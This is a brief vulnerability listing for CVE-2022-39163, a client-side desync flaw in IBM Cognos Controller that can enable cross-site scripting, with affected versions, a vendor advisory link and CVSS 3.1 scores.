Client-Side Desync Vulnerability in IBM Cognos Controller
CVE-2022-39163

4.7MEDIUM

Key Information:

Vendor

IBM
Status
Cognos Controller
Controller
Vendor
CVE Published:
26 March 2025

What is CVE-2022-39163?

IBM Cognos Controller versions 11.0.0 through 11.1.0 are susceptible to a Client-Side Desync (CSD) attack. This vulnerability allows an attacker to exploit a desynchronized connection in the browser, potentially leading to the execution of cross-site scripting (XSS) attacks. Malicious actors can manipulate the user session or inject harmful scripts, compromising sensitive user data and application integrity.

Affected Version(s)

Cognos Controller 11.0.0 <= 11.0.1

Controller 11.1.0

References

https://www.ibm.com/support/pages/node/7192746
vendor-advisory

CVSS V3.1

Score:
4.7
Severity:
MEDIUM
Confidentiality:
Low
Integrity:
Low
Availability:
Low
Attack Vector:
Network
Attack Complexity:
High
Privileges Required:
None
User Interaction:
Required
Scope:
Changed

Timeline

  • Vulnerability published

  • Vulnerability Reserved

.